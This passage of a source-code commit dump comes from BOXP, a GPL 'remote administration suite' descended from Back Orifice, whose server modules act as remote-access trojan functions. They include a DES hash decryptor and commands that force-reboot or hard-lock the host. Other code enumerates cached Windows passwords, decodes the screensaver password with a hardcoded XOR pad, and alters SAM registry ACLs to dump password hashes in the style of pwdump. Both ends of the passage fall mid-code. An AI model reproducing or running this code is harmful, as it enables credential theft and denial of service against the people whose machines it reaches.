(BYTE)(bytebit[l] >> 2); } } } } void des_str_to_key(BYTE *str, BYTE *key) { int i; key[0] = (str[0]>>1); key[1] = ((str[0]&0x01)<<6) | (str[1]>>2); key[2] = ((str[1]&0x03)<<5) | (str[2]>>3); key[3] = ((str[2]&0x07)<<4) | (str[3]>>4); key[4] = ((str[3]&0x0F)<<3) | (str[4]>>5); key[5] = ((str[4]&0x1F)<<2) | (str[5]>>6); key[6] = ((str[5]&0x3F)<<1) | (str[6]>>7); key[7] = (str[6]&0x7F); for (i=0;i<8;i++) key[i] = (BYTE)(key[i]<<1); } int BOAPI DESHash_Insert(GS *gs) { spinit(); perminit(iperm, ip); perminit(fperm, fp); return 0; } int BOAPI DESHash_Remove(GS *gs) { return 0; } char * BOAPI DESHash_Query(void) { return "DES: BOXP DES Hash Manipulation"; } void * BOAPI DESHash_Startup(GS *gs) { DESHASH_DATA *data; data=(DESHASH_DATA *)gs->fct.malloc(sizeof(DESHASH_DATA), gs); if(data==NULL) return NULL; return data; } int BOAPI DESHash_Shutdown(GS *gs, void *pInternal) { DESHASH_DATA *data=(DESHASH_DATA *)pInternal; gs->fct.free(data, gs); return 0; } int BOAPI DESHash_SetEncryptKey(GS *gs, void *pInternal, const char *svKey) { return 0; } int BOAPI DESHash_SetDecryptKey(GS *gs, void *pInternal, const char *svKey) { DESHASH_DATA *data=(DESHASH_DATA *)pInternal; BYTE key[8]; des_str_to_key((BYTE *)svKey,key); des_setkey(key,data->kn); return 0; } char * BOAPI DESHash_GetEncryptKey(GS *gs, void *pInternal) { return NULL; } char * BOAPI DESHash_GetDecryptKey(GS *gs, void *pInternal) { return NULL; } BYTE * BOAPI DESHash_Encrypt(GS *gs, void *pInternal, BYTE *pBuffer,int nBufLen,int *pnOutBufLen) { *pnOutBufLen=0; return NULL; } BYTE * BOAPI DESHash_Decrypt(GS *gs, void *pInternal, BYTE *pBuffer,int nBufLen,int *pnOutBufLen) { DESHASH_DATA *data=(DESHASH_DATA *)pInternal; BYTE *buf; int nOutBufLen,i; if(nBufLen&7) nOutBufLen=(nBufLen&~7)+8; else nOutBufLen=nBufLen; buf=(BYTE *)gs->fct.malloc(nOutBufLen, gs); if(buf==NULL) return NULL; gs->fct.memset(buf,0,nOutBufLen); gs->fct.memcpy(buf,pBuffer,nBufLen); for(i=0;i<nOutBufLen;i+=8) { des_dedes(gs, (BYTE *)buf+i,data->kn); } *pnOutBufLen=nOutBufLen; return buf; } int BOAPI DESHash_CreateNewKeys(GS *gs, void *pInternal) { return 0; } void BOAPI DESHash_Free(GS *gs, void *pInternal, BYTE *pBuffer) { DESHASH_DATA *data=(DESHASH_DATA *)pInternal; gs->fct.free(pBuffer, gs); } ENCRYPTION_ENGINE *GetDESHashEngine(void) { g_DESengine.pInsert=DESHash_Insert; g_DESengine.pRemove=DESHash_Remove; g_DESengine.pQuery=DESHash_Query; g_DESengine.pStartup=DESHash_Startup; g_DESengine.pShutdown=DESHash_Shutdown; g_DESengine.pSetEncryptKey=DESHash_SetEncryptKey; g_DESengine.pSetDecryptKey=DESHash_SetDecryptKey; g_DESengine.pGetEncryptKey=DESHash_GetEncryptKey; g_DESengine.pGetDecryptKey=DESHash_GetDecryptKey; g_DESengine.pEncrypt=DESHash_Encrypt; g_DESengine.pDecrypt=DESHash_Decrypt; g_DESengine.pCreateNewKeys=DESHash_CreateNewKeys; g_DESengine.pFree=DESHash_Free; return &g_DESengine; } --- NEW FILE: cmd_system.h --- /* BOXP - Remote Administration Suite Copyright (C) 2,003 - 2,004 BOXP Developers Team This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA > Autor: DilDog, dildog at users dot sourceforge dot net > Editor: Javier Aroche, j_aroche at users dot sourceforge dot net > Editor: Mickey Roberts, erus at users dot sourceforge dot net */ /* Ported to BOXP By Mickey Roberts <ma...@mt...> */ #ifndef __INC_CMD_SYSTEM_H #define __INC_CMD_SYSTEM_H #include<windows.h> //#include<auth.h> bool BOAPI CmdProc_SysReboot( GS *gs, BOCMD_CTX *ctx, DWORD nArg1, char *svArg2, char *svArg3 ); bool BOAPI CmdProc_SysLockup( GS *gs, BOCMD_CTX *ctx, DWORD nArg1, char *svArg2, char *svArg3 ); bool BOAPI CmdProc_SysListPasswords( GS *gs, BOCMD_CTX *ctx, DWORD nArg1, char *svArg2, char *svArg3 ); bool BOAPI CmdProc_SysViewConsole( GS *gs, BOCMD_CTX *ctx, DWORD nArg1, char *svArg2, char *svArg3 ); bool BOAPI CmdProc_SysInfo( GS *gs, BOCMD_CTX *ctx, DWORD nArg1, char *svArg2, char *svArg3 ); typedef BOOL (FAR PASCAL *CACHECALLBACK)( struct PASSWORD_CACHE_ENTRY FAR *pce, DWORD dwRefData ); typedef DWORD (WINAPI *ENUMPASSWORD)(LPSTR pbPrefix, WORD cbPrefix, BYTE nType, CACHECALLBACK pfnCallback, DWORD dwRefData); extern ENUMPASSWORD WNetEnumCachedPasswords; struct PASSWORD_CACHE_ENTRY { WORD cbEntry; WORD cbResource; WORD cbPassword; BYTE iEntry; BYTE nType; char abResource[1]; }; #endif --- NEW FILE: cmd_system.cpp --- /* BOXP - Remote Administration Suite Copyright (C) 2,003 - 2,004 BOXP Developers Team This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA > Autor: DilDog, dildog at users dot sourceforge dot net > Editor: Javier Aroche, j_aroche at users dot sourceforge dot net > Editor: Mickey Roberts, erus at users dot sourceforge dot net */ /* Ported to BOXP By Mickey Roberts <ma...@mt...> */ #include <srv_linkage.h> #include "dumppw.h" #include "main.h" #include "cmd_system.h" char * BOAPI xtoa ( unsigned __int64 val, char *buf, unsigned radix, bool is_neg ) { char *p; /* pointer to traverse string */ char *firstdig; /* pointer to first digit */ char temp; /* temp char */ unsigned digval; /* value of digit */ p = buf; if (is_neg) { /* negative, so output '-' and negate */ *p++ = '-'; val = (unsigned __int64)(-(__int64)val); } firstdig = p; /* save pointer to first digit */ do { digval = (unsigned) (val % radix); val /= radix; /* get next digit */ /* convert to ascii and store */ if (digval > 9) *p++ = (char) (digval - 10 + 'a'); /* a letter */ else *p++ = (char) (digval + '0'); /* a digit */ } while (val > 0); /* We now have the digit of the number in the buffer, but in reverse order. Thus we reverse them now. */ *p-- = '\0'; /* terminate string; p points to last digit */ do { temp = *p; *p = *firstdig; *firstdig = temp; /* swap *p and *firstdig */ --p; ++firstdig; /* advance to next two digits */ } while (firstdig < p); /* repeat until halfway */ return buf; } typedef DWORD (WINAPI *ENUMPASSWORD)(LPSTR pbPrefix, WORD cbPrefix, BYTE nType, CACHECALLBACK pfnCallback, DWORD dwRefData); ENUMPASSWORD pWNetEnumCachedPasswords; bool BOAPI CmdProc_SysReboot( GS *gs, BOCMD_CTX *ctx, DWORD nArg1, char *svArg2, char *svArg3 ) { BOOL bRet; bRet=gs->api.pExitWindowsEx(EWX_FORCE|EWX_REBOOT, 0); if(bRet==0) gs->fct.IssueAuthCmdReply( gs, ctx, BCC_ERR, "Reboot attempt failed.\n"); else gs->fct.IssueAuthCmdReply( gs, ctx, 0, "Rebooting now.\n" ); return true; } DWORD WINAPI LockThread(LPVOID param) { while(1); return 0; } bool BOAPI CmdProc_SysLockup( GS *gs, BOCMD_CTX *ctx, DWORD nArg1, char *svArg2, char *svArg3 ) { gs->fct.IssueAuthCmdReply( gs, ctx, BCC_INFO, "Locking up machine\n[Don't expect much to work afte doing this!]\n"); gs->api.pSleep(2000); if(gs->gv.bIsWinNT) { API *api = &gs->api; api->pSetPriorityClass(api->pGetCurrentProcess(),REALTIME_PRIORITY_CLASS); while(1) { DWORD dwTid; HANDLE hThread=api->pCreateThread(NULL,0,LockThread,NULL,0,&dwTid); api->pSetThreadPriority(hThread,THREAD_PRIORITY_TIME_CRITICAL); } } else { lockpoint: __asm { cli jmp lockpoint } } return 0; } #pragma pack(push,1) typedef struct { GS *gs; char *pBuffer; int nBufLen; int nBufPos; } PASSCACHECALLBACK_DATA; #pragma pack(pop) BOOL PASCAL PassCacheCallback(struct PASSWORD_CACHE_ENTRY FAR *pce, DWORD dwRefData) { char buff[1024]; char buff2[1024]; int nCount; GS *gs; PASSCACHECALLBACK_DATA *dat; dat = (PASSCACHECALLBACK_DATA *)dwRefData; gs = dat->gs; nCount=pce->cbResource; if( nCount>1023 ) nCount=1023; gs->fct.memmove(buff, pce->abResource, nCount); buff[nCount] = 0; CharToOem(buff, buff2); if((dat->nBufPos+gs->api.plstrlen(buff2))>=dat->nBufLen) return FALSE; gs->api.plstrcpy(dat->pBuffer+dat->nBufPos,buff2); dat->nBufPos+=gs->api.plstrlen(buff2)+1; nCount=pce->cbPassword; if(nCount>1023) nCount=1023; gs->fct.memmove(buff, pce->abResource+pce->cbResource, nCount); buff[nCount] = 0; CharToOem(buff, buff2); if((dat->nBufPos+gs->api.plstrlen(buff2))>=dat->nBufLen) return FALSE; gs->api.plstrcpy(dat->pBuffer+dat->nBufPos,buff2); dat->nBufPos+=gs->api.plstrlen(buff2)+1; return TRUE; } bool BOAPI CmdProc_SysListPasswords( GS *gs, BOCMD_CTX *ctx, DWORD nArg1, char *svArg2, char *svArg3 ) { API *api = &gs->api; FCT *fct = &gs->fct; char svBuffer[512]; DWORD dwBufSize; char svReply[512]; if (gs->gv.bIsWinNT) { // PWDump style password dumping DumpPasswordHashes(gs, ctx); } else { HINSTANCE hMpr=api->pLoadLibrary("MPR.DLL"); pWNetEnumCachedPasswords = (ENUMPASSWORD)api->pGetProcAddress(hMpr, "WNetEnumCachedPasswords"); // Return passwords from password cache fct->IssueAuthCmdReply( gs, ctx, 0, "Passwords cached by system:\n"); PASSCACHECALLBACK_DATA dat; dat.pBuffer=(char *)fct->malloc(65536, gs); dat.nBufLen=65536; dat.nBufPos=0; dat.gs=gs; pWNetEnumCachedPasswords(NULL, 0, 0xff, PassCacheCallback, (DWORD) &dat); fct->IssueAuthCmdReply( gs, ctx, 0, "Cached Passwords: \n" ); char *svStr; svStr=dat.pBuffer; while(*svStr!='\0') { char *svRsc=svStr; svStr+=api->plstrlen(svStr)+1; char *svPwd=svStr; svStr+=api->plstrlen(svStr)+1; char svBuff[1024]; api->pwsprintf(svBuff, "Resource: '%.256s' Password: '%.256s'\n", svRsc, svPwd); fct->IssueAuthCmdReply( gs, ctx, 0, svBuff ); } fct->free(dat.pBuffer, gs); fct->IssueAuthCmdReply( gs, ctx, 0, "End of cached passwords.\n" ); // Return screen saver password char *regpws[5] = { ".Default", "Control Panel", "desktop", "" }; HKEY key=HKEY_USERS,key2; int l; DWORD indx=0; while(regpws[indx][0]) { l=api->pRegOpenKeyEx(key, regpws[indx], 0, KEY_READ, &key2) ; if(key!=HKEY_USERS) api->pRegCloseKey(key); if(l!=ERROR_SUCCESS) { api->plstrcpy(svReply,"There is no screensaver password.\n"); goto exitssavepw; } key = key2; indx++; } dwBufSize=512; if(api->pRegQueryValueEx(key, "ScreenSave_Data", NULL, NULL, (BYTE *)svBuffer, &dwBufSize)!=ERROR_SUCCESS) { api->plstrcpy(svReply, "Unable to read value 'ScreenSave_Data'.\n"); } else { // decode hex chars for (indx = 0; indx < dwBufSize/2; indx++) { char c1,c2; c1=svBuffer[indx*2]; if(c1>='A' && c1<='F') c1=(c1-'A')+0xA; else if(c1>='a' && c1<='f') c1=(c1-'a')+0xA; else if(c1>='0' && c1<='9') c1=c1-'0'; c2=svBuffer[indx*2+1]; if(c2>='A' && c2<='F') c2=(c2-'A')+0xA; else if(c2>='a' && c2<='f') c2=(c2-'a')+0xA; else if(c2>='0' && c2<='9') c2=c2-'0'; svBuffer[indx] = (c1<<4) | c2; } // xor with pad unsigned char xorpattern[60] = {0x48, 0xEE, 0x76, 0x1D, 0x67, 0x69, 0xA1, 0x1B, 0x7A, 0x8C, 0x47, 0xF8, 0x54, 0x95, 0x97, 0x5F, 0x78, 0xd9, 0xda, 0x6c, 0x59, 0xd7, 0x6B, 0x35, 0xC5, 0x77, 0x85, 0x18, 0x2A, 0x0E, 0x52, 0xFF, 0x00, 0xE3, 0x1B, 0x71, 0x8D, 0x34, 0x63, 0xEB, 0x91, 0xC3, 0x24, 0x0F, 0xB7, 0xC2, 0xF8, 0xE3, 0xB6, 0x54, 0x4C, 0x35, 0x54, 0xE7, 0xC9, 0x49, 0x28, 0xA3, 0x85, 0x11}; DWORD len; len=dwBufSize/2; if(len>60) len=60; for (indx = 0; indx < len; indx++) { svBuffer[indx] ^= xorpattern[indx]; } svBuffer[len] = '\0'; api->pwsprintf(svReply, "ScreenSaver password: '%s'\n", svBuffer); } api->pRegCloseKey(key); exitssavepw: fct->IssueAuthCmdReply( gs, ctx, 0, svReply ); } return true; } bool BOAPI CmdProc_SysViewConsole( GS *gs, BOCMD_CTX *ctx, DWORD nArg1, char *svArg2, char *svArg3 ) { return false; } bool BOAPI CmdProc_SysInfo( GS *gs, BOCMD_CTX *ctx, DWORD nArg1, char *svArg2, char *svArg3 ) { API *api = &gs->api; FCT *fct = &gs->fct; char svBuffer[512]; DWORD dwBufSize; char svReply[512]; OSVERSIONINFOEX osvi; // OS information bool bOsVersionInfoEx; // have used OSVERSIONINFOEX or OSVERSIONINFO? SYSTEM_INFO sysInfo; // Processor/hardware info ///////////////////////////////////////////// // Send back computer name // Regresar el nombre de la computadora dwBufSize = MAX_COMPUTERNAME_LENGTH+1; if(api->pGetComputerName(svBuffer, &dwBufSize)==FALSE) { fct->IssueAuthCmdReply( gs, ctx, BCC_ERR, "Could not retrieve machine name.\n" ); } else { api->pwsprintf(svReply, "System info for machine '%.400s'\n", svBuffer); fct->IssueAuthCmdReply( gs, ctx, 0, svReply ); } ///////////////////////////////////////////// // Send back currently logged in user name // Regresar el usuario actualmente en session dwBufSize = 512; if(api->pGetUserName(svBuffer, &dwBufSize)==FALSE) { fct->IssueAuthCmdReply( gs, ctx, BCC_ERR, "Could not retrieve user name.\n" ); } else { api->pwsprintf(svReply, "Current user: '%.400s'\n", svBuffer); fct->IssueAuthCmdReply( gs, ctx, 0, svReply ); } ///////////////////////////////////////////// // Send back processor info // Regresar la informacion del procesador api->plstrcpy(svReply, "Processor: "); api->pGetSystemInfo(&sysInfo); switch (sysInfo.dwProcessorType) { case PROCESSOR_INTEL_386: api->plstrcat(svReply, "I386\n"); break; case PROCESSOR_INTEL_486: api->plstrcat(svReply, "I486\n"); break; case PROCESSOR_INTEL_PENTIUM: api->plstrcat(svReply, "I586\n"); break; case PROCESSOR_MIPS_R4000: api->plstrcat(svReply, "MIPSR4000\n"); break; default: api->plstrcat(svReply, "UNKNOWN\n"); break; } fct->IssueAuthCmdReply( gs, ctx, 0, svReply ); ///////////////////////////////////////////// // Send back operative system info. // Regresar la informacion del sistema operativo. /////////////////////////////////////////////////////////////////////// // Atention: This part of code uses the last MS Platform SDK source // files (for OSVERSIONINFOEX structure). // You need to get them if you are using Visual Studio 6. /////////////////////////////////////////////////////////////////////// // Atencion: Esta parte del código usa los ultimos archivos de MS // Platform SDK (para la estructura OSVERSIONINFOEX). // Necesita obtenerlos si usa Visual Studio 6. /////////////////////////////////////////////////////////////////////// // Try calling GetVersionEx using the OSVERSIONINFOEX structure. // If that fails, try using the OSVERSIONINFO structure. fct->memset(&osvi,0, sizeof(OSVERSIONINFOEX)); osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX); if( !(bOsVersionInfoEx = (bool)(GetVersionEx ((OSVERSIONINFO *) &osvi)==TRUE?true:false) ) ) { // If OSVERSIONINFOEX doesn't work, try OSVERSIONINFO. osvi.dwOSVersionInfoSize = sizeof (OSVERSIONINFO); if ( GetVersionEx ( (OSVERSIONINFO *) &osvi)==FALSE) { api->plstrcpy(svReply, "Could not get version info.\n"); goto done; } } switch (osvi.dwPlatformId) { case VER_PLATFORM_WIN32_NT: // Test for the product. if ( osvi.dwMajorVersion <= 4 ) api->plstrcpy( svReply, "Windows NT 4"); if ( osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 0 ) api->plstrcpy( svReply, "Windows 2000 "); if ( osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 1 ) api->plstrcpy( svReply, "Windows XP "); // Test for product type. if( bOsVersionInfoEx ) { if ( osvi.wProductType == VER_NT_WORKSTATION ) { if( osvi.wSuiteMask & VER_SUITE_PERSONAL ) api->plstrcat( svReply," Personal " ); else api->plstrcat( svReply," Professional " ); } else if ( osvi.wProductType == VER_NT_SERVER ) { if( osvi.wSuiteMask & VER_SUITE_DATACENTER ) api->plstrcat( svReply," DataCenter Server " ); else if( osvi.wSuiteMask & VER_SUITE_ENTERPRISE ) api->plstrcat( svReply," Advanced Server " ); else api->plstrcat( svReply," Server " ); } } else { HKEY hKey; char szProductType[80]; DWORD dwBufLen; RegOpenKeyEx( HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control\\ProductOptions", 0, KEY_QUERY_VALUE, &hKey ); RegQueryValueEx( hKey, "ProductType", NULL, NULL, (LPBYTE) szProductType, &dwBufLen); RegCloseKey( hKey ); if ( lstrcmpi( "WINNT", szProductType) == 0 ) api->plstrcat( svReply," Professional " ); if ( lstrcmpi( "LANMANNT", szProductType) == 0 ) api->plstrcat( svReply," Server " ); if ( lstrcmpi( "SERVERNT", szProductType) == 0 ) api->plstrcat( svReply," Advanced Server " ); } // Display version, service pack (if any), and build number. if ( osvi.dwMajorVersion <= 4 ) { api->pwsprintf( svReply,"%s Version %d.%d %s (Build %d)\n", svReply, osvi.dwMajorVersion, osvi.dwMinorVersion, osvi.szCSDVersion, osvi.dwBuildNumber & 0xFFFF); } else { api->pwsprintf( svReply,"%s %s (Build %d)\n", svReply, osvi.szCSDVersion, osvi.dwBuildNumber & 0xFFFF); } break; case VER_PLATFORM_WIN32_WINDOWS: if (osvi.dwMajorVersion == 4 && osvi.dwMinorVersion == 0) { api->plstrcpy( svReply, "Windows 95 "); if ( osvi.szCSDVersion[1] == 'C' || osvi.szCSDVersion[1] == 'B' ) api->plstrcat( svReply, "OSR2 " ); } if (osvi.dwMajorVersion == 4 && osvi.dwMinorVersion == 10) { api->plstrcpy( svReply, "Windows 98 "); if ( osvi.szCSDVersion[1] == 'A' ) api->plstrcat( svReply, "SE " ); } if (osvi.dwMajorVersion == 4 && osvi.dwMinorVersion == 90) { api->plstrcpy( svReply, "Windows ME "); } break; case VER_PLATFORM_WIN32s: api->plstrcpy( svReply, "Microsoft Win32s "); break; } api->plstrcat( svReply, "\n" ); done: fct->IssueAuthCmdReply( gs, ctx, 0, svReply ); ///////////////////////////////////////////// // Send back global memory usage // Regresar el uso global de la memoria MEMORYSTATUS memstat; DWORD dw,dw2,dw3,dw4; char stot[22],sfree[22]; ULARGE_INTEGER ddwFreeC,ddwTotBytes,ddwTotFreeBytes; char c; int x; memstat.dwLength = sizeof(memstat); api->pGlobalMemoryStatus(&memstat); api->pwsprintf(svReply, "Memory: %dM in use: %d%% Page file: %dM free: %dM\n", memstat.dwTotalPhys/1024/1024, memstat.dwMemoryLoad, memstat.dwTotalPageFile/1024/1024, memstat.dwAvailPageFile/1024/1024 ); fct->IssueAuthCmdReply( gs, ctx, 0, svReply ); for (c = 'C'; c <= 'Z'; c++) { api->pwsprintf(svReply, "%c:\\", c); x = api->pGetDriveType(svReply); api->plstrcat( svReply, " - "); switch (x) { case 0: api->plstrcat(svReply, "Unable to determine.\n"); break; case 1: svReply[0]='\0'; break; case DRIVE_REMOVABLE: api->plstrcat(svReply, "Removable\n"); break; case DRIVE_FIXED: api->plstrcat(svReply, "Fixed"); api->pwsprintf(svBuffer, "%c:\\", c); // Intentar con GetDiskFreeSpaceEx // try with GetDiskFreeSpaceEx. if ( api->pGetDiskFreeSpaceEx && api->pGetDiskFreeSpaceEx(svBuffer,&ddwFreeC,&ddwTotBytes,&ddwTotFreeBytes) ) { xtoa(ddwTotBytes.QuadPart,stot,10,false); xtoa(ddwTotFreeBytes.QuadPart,sfree,10,false); dw = (DWORD) (ddwTotFreeBytes.QuadPart / (1024*1024)); dw2 = (DWORD) (ddwTotBytes.QuadPart / (1024*1024)); api->pwsprintf(svBuffer, " Bytes free: %u MB(%s)/%u MB(%s)\n", dw,sfree,dw2,stot ); api->plstrcat(svReply, svBuffer); } else if ( api->pGetDiskFreeSpace(svBuffer, &dw, &dw2, &dw3, &dw4) ) { api->pwsprintf(svBuffer, " Bytes free: %u MB(%u)/%u MB(%u)\n", (dw3*dw2*dw/(1024*1024)),(unsigned int)(dw3*dw2*dw), (dw4*dw2*dw/(1024*1024)),(unsigned int)(dw4*dw2*dw)); api->plstrcat(svReply, svBuffer); } else gs->api.plstrcat(svReply,"\n"); break; case DRIVE_REMOTE: api->plstrcat(svReply, "Remote\n"); break; case DRIVE_CDROM: api->plstrcat(svReply, "CD-ROM\n"); break; case DRIVE_RAMDISK: api->plstrcat(svReply, "Ramdisk\n"); break; default: api->plstrcat(svReply, "Unknown type!\n"); break; } if(api->plstrlen(svReply)) fct->IssueAuthCmdReply( gs, ctx, 0, svReply ); } fct->IssueAuthCmdReply( gs, ctx, 0, "End of system info.\n"); return true; } --- NEW FILE: main.h --- /* BOXP - Remote Administration Suite Copyright (C) 2,003 - 2,004 BOXP Developers Team This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA > Autor: DilDog, dildog at users dot sourceforge dot net > Editor: Javier Aroche, j_aroche at users dot sourceforge dot net > Editor: Mickey Roberts, erus at users dot sourceforge dot net */ /* Ported to BOXP By Mickey Roberts <ma...@mt...> */ #ifndef __INC_MAIN_H #define __INC_MAIN_H #include <srv_linkage.h> #include "main.h" #include "cmd_process.h" #include "cmd_system.h" // ------------- Function Implementations ------------------ extern HINSTANCE g_hInstance; extern BOOL g_bActive; #endif --- NEW FILE: dumppw.cpp --- /* BOXP - Remote Administration Suite Copyright (C) 2,003 - 2,004 BOXP Developers Team This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA > Autor: DilDog, dildog at users dot sourceforge dot net > Editor: Javier Aroche, j_aroche at users dot sourceforge dot net > Editor: Mickey Roberts, erus at users dot sourceforge dot net */ /* Ported to BOXP By Mickey Roberts <ma...@mt...> */ // DumpPW - Thanks to Jeremy Allison for pwdump, it was // what this was based on. #include <stdarg.h> #include <srv_linkage.h> #include "deshash.h" #include "main.h" DWORD hexstrtoul(char *str) { DWORD val; int i; char c1; val=0; for(i=0;i<8;i++) { if(*str=='\0') break; c1=*str++; if(c1>='A' && c1<='F') c1=(c1-'A')+0xA; else if(c1>='a' && c1<='f') c1=(c1-'a')+0xA; else if(c1>='0' && c1<='9') c1=(c1-'0'); val<<=4; val|=c1; } return val; } // // Utility function to get allocate a SID from a name. // Looks on local machine. SID is allocated with malloc // and must be freed by the caller. // Returns TRUE on success, FALSE on fail. // static BOOL get_sid(GS *gs, const char *name, SID **ppsid) { FCT *fct = &gs->fct; SID_NAME_USE sid_use; char *domain; DWORD sid_size = 0; DWORD dom_size = 0; *ppsid = 0; if(LookupAccountName(0, name, 0, &sid_size, 0, &dom_size, &sid_use) == 0) { if(GetLastError() != ERROR_INSUFFICIENT_BUFFER) return FALSE; } *ppsid = (SID *)fct->malloc(sid_size, gs); domain = (char *)fct->malloc(dom_size, gs); if(*ppsid == 0 || domain == 0) { if(*ppsid) fct->free(*ppsid, gs); if(domain) fct->free(domain, gs); *ppsid = 0; return FALSE; } if(LookupAccountName(0, name, *ppsid, &sid_size, domain, &dom_size, &sid_use)==0) { fct->free(*ppsid, gs); fct->free(domain, gs); *ppsid = 0; return FALSE; } fct->free(domain, gs); return TRUE; } // // Utility function to setup a security descriptor // from a varargs list of char *name followed by a DWORD access // mask. The access control list is allocated with malloc // and must be freed by the caller. // returns TRUE on success, FALSE on fail. // static BOOL __cdecl create_sd_from_list( GS *gs, SECURITY_DESCRIPTOR *sdout, int num, ...) { FCT *fct = &gs->fct; va_list ap; SID **sids = 0; char *name; DWORD amask; DWORD acl_size; PACL pacl = 0; int i; if((sids=(SID **)fct->malloc(sizeof(SID *)*num, gs))==0) return FALSE; acl_size = num * (sizeof(ACL) + sizeof(ACCESS_ALLOWED_ACE) + sizeof(DWORD)); // Collect all the SID's va_start( ap, num); for(i=0;i<num;i++) { name = va_arg( ap, char *); amask = va_arg(ap, DWORD); if(get_sid( gs, name, &sids[i]) == FALSE) goto cleanup; acl_size += GetLengthSid(sids[i]); } va_end(ap); if((pacl = (PACL)fct->malloc(acl_size, gs)) == 0) goto cleanup; if(InitializeSecurityDescriptor( sdout, SECURITY_DESCRIPTOR_REVISION) == FALSE) goto cleanup; if(InitializeAcl( pacl, acl_size, ACL_REVISION) == FALSE) goto cleanup; va_start(ap, num); for( i = 0; i < num; i++) { ACE_HEADER *ace_p; name = va_arg( ap, char *); amask = va_arg( ap, DWORD); if(AddAccessAllowedAce( pacl, ACL_REVISION, amask, sids[i]) == FALSE) goto cleanup; // Make sure the ACE is inheritable if(GetAce( pacl, 0, (LPVOID *)&ace_p) == FALSE) goto cleanup; ace_p->AceFlags |= ( CONTAINER_INHERIT_ACE | OBJECT_INHERIT_ACE); } // Add the ACL into the sd if(SetSecurityDescriptorDacl( sdout, TRUE, pacl, FALSE) == FALSE) goto cleanup; for( i = 0; i < num; i++) { if(sids[i]) fct->free(sids[i], gs); } fct->free(sids, gs); return TRUE; cleanup: if(sids) { for( i = 0; i < num; i++) { if(sids[i]) fct->free(sids[i], gs); } fct->free(sids, gs); } if(pacl) fct->free(pacl, gs); return FALSE; } // // Function to go over all the users in the SAM and set an ACL // on them. // static int set_userkeys_security( GS *gs, HKEY start, const char *path, SECURITY_DESCRIPTOR *psd, HKEY *return_key) { API *api = &gs->api; HKEY key; DWORD err; char usersid[128]; DWORD indx = 0; // Open the path and enum all the user keys - setting the same security on them. if((err=api->pRegOpenKeyEx(start,path,0,KEY_ENUMERATE_SUB_KEYS,&key))!=ERROR_SUCCESS) return -1; // Now enumerate the subkeys, setting the security on them all. do { DWORD size; FILETIME ft; size=sizeof(usersid); err=api->pRegEnumKeyEx(key,indx,usersid,&size,0,0,0,&ft); if(err==ERROR_SUCCESS) { HKEY subkey; indx++; if((err=api->pRegOpenKeyEx(key,usersid,0,WRITE_DAC,&subkey))!=ERROR_SUCCESS) { RegCloseKey(key); return -1; } if((err=RegSetKeySecurity(subkey,DACL_SECURITY_INFORMATION,psd))!=ERROR_SUCCESS) { api->pRegCloseKey(subkey); api->pRegCloseKey(key); return -1; } api->pRegCloseKey(subkey); } } while(err==ERROR_SUCCESS); if(err!=ERROR_NO_MORE_ITEMS) { api->pRegCloseKey(key); return -1; } if(return_key==0) api->pRegCloseKey(key); else *return_key=key; return 0; } // // Function to travel down the SAM security tree in the registry and restore // the correct ACL on them. Returns 0 on success. -1 on fail. // static int restore_sam_tree_access( GS *gs, HKEY start ) { API *api = &gs->api; char path[128]; char AdminGroupName[128]; char *p; int i; HKEY key; DWORD err; SECURITY_DESCRIPTOR sd; DWORD admin_mask; admin_mask = WRITE_DAC | READ_CONTROL; api->plstrcpy(AdminGroupName, "Administrators"); if(!create_sd_from_list( gs, &sd, 2, "SYSTEM", GENERIC_ALL,AdminGroupName, admin_mask)) return -1; api->plstrcpy(path,"SECURITY\\SAM\\Domains\\Account\\Users"); // Remove the security on the user keys first. if(set_userkeys_security( gs, start, path, &sd, 0)!=0) return -1; // now go up the path, restoring security do { if((err=api->pRegOpenKeyEx(start,path,0,WRITE_DAC,&key)) != ERROR_SUCCESS) return -1; if((err=RegSetKeySecurity( key, DACL_SECURITY_INFORMATION,&sd)) != ERROR_SUCCESS) { api->pRegCloseKey(key); return -1; } api->pRegCloseKey(key); p=path+(api->plstrlen(path)-1); for(i=(api->plstrlen(path)-1);i>=0;i--) { if(*p=='\\') { *p=0; break; } } } while(i!=-1); return 0; } // // Function to travel the security tree and add Administrators // access as WRITE_DAC, READ_CONTROL and READ. // Returns 0 on success. -1 on fail if no security was changed, // -2 on fail if security was changed. // static int set_sam_tree_access( GS *gs, HKEY start, HKEY *return_key ) { API *api = &gs->api; char path[128]; char *p; char AdminGroupName[128]; HKEY key; DWORD err; BOOL security_changed = FALSE; SECURITY_DESCRIPTOR sd; DWORD admin_mask; BOOL finished = FALSE; admin_mask = WRITE_DAC | READ_CONTROL | KEY_QUERY_VALUE | 